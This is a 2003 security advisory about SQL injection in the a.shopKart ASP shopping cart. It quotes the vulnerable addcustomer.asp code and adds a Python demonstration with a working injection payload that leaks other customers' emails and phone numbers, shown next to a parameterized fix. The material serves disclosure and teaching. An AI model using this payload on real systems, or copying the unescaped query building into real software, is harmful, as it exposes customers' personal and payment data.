a.shopKart Shopping Cart remote vulnerabilities

From: Ignacio Vazquez (infosecmanagerat_private)
Date: Wed Jan 08 2003 - 08:02:39 PST


    Centaura Technologies Security Research Lab Advisory
    
    Product Name: a.shopKart Web Shopping Cart
    Systems: Windows NT/2000/.NET Server
    Severity: High Risk
    Remote: Yes
    Category: Insufficient input checking
    Vendor URL: http://www.urlogy.com
    Advisory Author: Ignacio Vazquez
    Advisory URL: http://www.centaura.com.ar/infosec/adv/ashopkart.txt
    Revised-Date: January 9, 2003
    Advisory Code: CTADVIIC046
    
    
    .:Introduction
    
    a.shopKart is a free shopping cart developed in ASP.
    Its features include product updating, customer management, etc.
    
    .: Impact
    An attacker can access sensitive information within the system
    database.
    
    This can lead to disclosure of sensitive personal information, including
    but not limited to credit card information, addresses and telephone
    numbers.
    
    .: Description
    The program is vulnerable in several places in the code.
    There is a basic input-sanitizing function, TwoSingleQ(str) (by its
    name, it doubles single quotes), but it is not applied everywhere,
    leaving exploitable holes.
    
    The following statement, taken from addcustomer.asp, shows the
    vulnerable points. Here "zip", "state", "country", "phone" and "fax"
    are concatenated into the query without passing through TwoSingleQ,
    so they are open to SQL injection.
    
    sqlAdd = "INSERT INTO customers(cfirstname,clastname,cemail,caddress"
    If Request.Form("address2") <> "" Then
        sqlAdd = sqlAdd & ",caddress2"
    End If
    sqlAdd = sqlAdd & ",ctown,czip"
    If Request.Form("state") <> "" Then
        sqlAdd = sqlAdd & ",cstate"
    End If
    sqlAdd = sqlAdd & ",ccountry,cphone"
    If Request.Form("fax") <> "" Then
        sqlAdd = sqlAdd & ",cfax"
    End If
    sqlAdd = sqlAdd & ") VALUES("
    ' These fields go through TwoSingleQ before concatenation
    sqlAdd = sqlAdd & "'" & TwoSingleQ(fname) & "'"
    sqlAdd = sqlAdd & ",'" & TwoSingleQ(lname) & "'"
    sqlAdd = sqlAdd & ",'" & TwoSingleQ(email) & "'"
    sqlAdd = sqlAdd & ",'" & TwoSingleQ(address) & "'"
    If Request.Form("address2") <> "" Then
        sqlAdd = sqlAdd & ",'" & TwoSingleQ(Request.Form("address2")) & "'"
    End If
    sqlAdd = sqlAdd & ",'" & TwoSingleQ(town) & "'"
    ' zip is concatenated raw: no TwoSingleQ
    sqlAdd = sqlAdd & ",'" & zip & "'"
    If Request.Form("state") <> "" Then
        ' state is concatenated raw: no TwoSingleQ
        sqlAdd = sqlAdd & ",'" & Request.Form("state") & "'"
    End If
    ' country and phone are concatenated raw: no TwoSingleQ
    sqlAdd = sqlAdd & ",'" & country & "'"
    sqlAdd = sqlAdd & ",'" & phone & "'"
    If Request.Form("fax") <> "" Then
        ' fax is concatenated raw: no TwoSingleQ
        sqlAdd = sqlAdd & ",'" & Request.Form("fax") & "'"
    End If
    sqlAdd = sqlAdd & ")"
    	
    At least addcustomer.asp, addprod.asp and process.asp are vulnerable to
    this type of attack.
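    The following is an added example, not code from the advisory or from
    the a.shopKart vendor. It reproduces the string-building logic of the
    addcustomer.asp statement above in Python against an in-memory SQLite
    database (an assumption; the real product targets a Windows/ASP stack
    whose database is not named here), reconstructs TwoSingleQ as a
    quote-doubling function (an assumption based on its name), and shows
    how an unescaped "phone" value lets a customer read other customers'
    data back through their own record. The parameterized builder next to
    it is the fix a practitioner would apply.

```python
import sqlite3

# Reconstruction of the advisory's TwoSingleQ(): double every single quote
# (assumption: the advisory only names the function, it does not show it).
def two_single_q(s):
    return s.replace("'", "''")

def q(v):
    return "'" + v + "'"

def build_insert_vulnerable(form):
    """Same string-building as addcustomer.asp: TwoSingleQ on some fields,
    nothing at all on zip, state, country, phone and fax."""
    cols = ["cfirstname", "clastname", "cemail", "caddress"]
    vals = [q(two_single_q(form["fname"])), q(two_single_q(form["lname"])),
            q(two_single_q(form["email"])), q(two_single_q(form["address"]))]
    if form.get("address2"):
        cols.append("caddress2"); vals.append(q(two_single_q(form["address2"])))
    cols += ["ctown", "czip"]
    vals += [q(two_single_q(form["town"])), q(form["zip"])]      # zip: raw
    if form.get("state"):
        cols.append("cstate"); vals.append(q(form["state"]))     # state: raw
    cols += ["ccountry", "cphone"]
    vals += [q(form["country"]), q(form["phone"])]               # both raw
    if form.get("fax"):
        cols.append("cfax"); vals.append(q(form["fax"]))         # fax: raw
    return "INSERT INTO customers(%s) VALUES(%s)" % (",".join(cols), ",".join(vals))

def build_insert_safe(form):
    """Same conditional column list, but every value is a bound parameter,
    so no user input is ever parsed as SQL."""
    cols = ["cfirstname", "clastname", "cemail", "caddress"]
    params = [form["fname"], form["lname"], form["email"], form["address"]]
    if form.get("address2"):
        cols.append("caddress2"); params.append(form["address2"])
    cols += ["ctown", "czip"]; params += [form["town"], form["zip"]]
    if form.get("state"):
        cols.append("cstate"); params.append(form["state"])
    cols += ["ccountry", "cphone"]; params += [form["country"], form["phone"]]
    if form.get("fax"):
        cols.append("cfax"); params.append(form["fax"])
    sql = "INSERT INTO customers(%s) VALUES(%s)" % (",".join(cols), ",".join("?" * len(cols)))
    return sql, params

def fresh_db():
    """Constructed schema and one seeded victim row (hypothetical data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers(cid INTEGER PRIMARY KEY, cfirstname TEXT,"
               " clastname TEXT, cemail TEXT, caddress TEXT, caddress2 TEXT,"
               " ctown TEXT, czip TEXT, cstate TEXT, ccountry TEXT, cphone TEXT, cfax TEXT)")
    db.execute("INSERT INTO customers(cfirstname,clastname,cemail,caddress,ctown,"
               "czip,ccountry,cphone) VALUES(?,?,?,?,?,?,?,?)",
               ("Alice", "Smith", "alice@example.test", "1 Main St",
                "Springfield", "12345", "US", "555-0100"))
    return db

# Injected "phone": closes the literal, concatenates a subquery over the
# whole table, and reopens the literal so the INSERT still parses.
# (SQLite string concatenation is ||; the advisory's platform is not shown.)
PAYLOAD = "' || (SELECT group_concat(cemail || ':' || cphone) FROM customers) || '"

def attacker_form():
    return {"fname": "Mallory", "lname": "O'Hara", "email": "mallory@example.test",
            "address": "9 Side St", "address2": "", "town": "Shelbyville",
            "zip": "00000", "state": "", "country": "US", "phone": PAYLOAD, "fax": ""}

def run_vulnerable():
    """Returns what the attacker's own cphone column holds after the insert."""
    db = fresh_db()
    db.execute(build_insert_vulnerable(attacker_form()))
    row = db.execute("SELECT cphone FROM customers WHERE cemail='mallory@example.test'").fetchone()
    return row[0]   # other customers' email:phone pairs, leaked into Mallory's record

def run_safe():
    db = fresh_db()
    sql, params = build_insert_safe(attacker_form())
    db.execute(sql, params)
    row = db.execute("SELECT cphone FROM customers WHERE cemail='mallory@example.test'").fetchone()
    return row[0]   # the payload stored literally, nothing executed

if __name__ == "__main__":
    print("vulnerable:", run_vulnerable())
    print("safe:      ", run_safe())
```

    Note that the "O'Hara" surname passes cleanly through the vulnerable
    builder because TwoSingleQ is applied to it; the problem is only the
    fields that bypass it. Escaping every field would close this particular
    hole, but binding parameters removes the whole class of mistake, which
    is why the safe builder does not call TwoSingleQ at all.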
    
    .: Official Fix Information
    
    The vendor has been contacted but no fix has been released yet.
    
    -----
    
    Ignacio Vazquez
    <ivazquezat_private>
    
    Director of Technology
    Security Labs Manager
    
    Centaura Technologies
    http://www.centaura.com.ar
    



    This archive was generated by hypermail 2b30 : Wed Jan 08 2003 - 12:27:03 PST